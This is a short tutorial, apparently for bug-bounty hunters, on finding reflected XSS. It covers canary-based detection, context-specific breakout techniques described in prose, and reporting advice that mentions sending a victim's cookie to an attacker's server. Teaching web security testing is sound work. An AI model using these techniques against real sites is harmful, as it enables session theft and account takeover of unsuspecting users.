Reflected XSS in practice — context is everything
Reflected XSS happens when user input is echoed back into the page in a way that lets the attacker inject JavaScript. The hunt starts with detecting the reflection itself, which is best done with a unique canary token containing characters that are special in every common context — angle brackets, quotes and backslashes.
Detecting the reflection
Send your canary as the value of every parameter and search the HTML source for it. Note exactly where in the page it lands — inside an HTML body, inside an attribute value with single or double quotes, inside a JavaScript string literal, inside a URL position, or inside a style block. Each context demands a different escape sequence to break out, and the working payload depends entirely on which context you landed in.
Context-aware payloads
Inside the HTML body, an SVG with an onload handler is the modern default, since it dodges blocklists tuned to script tags. Inside an attribute value with a single quote, you escape with a single quote, then add an event handler. Inside a JavaScript string literal, you escape with a double quote and a semicolon. Inside a URL position, the JavaScript protocol is the classic. Inside a style block, you close the style tag and proceed as in body context.
Reporting
A single working alert popup is a proof of concept, but the severity bumps if you also demonstrate session theft or a privileged action. A short fetch to the attacker's server carrying the document cookie, or a fetch that performs a profile-update on behalf of the victim, lifts the report from medium into high.
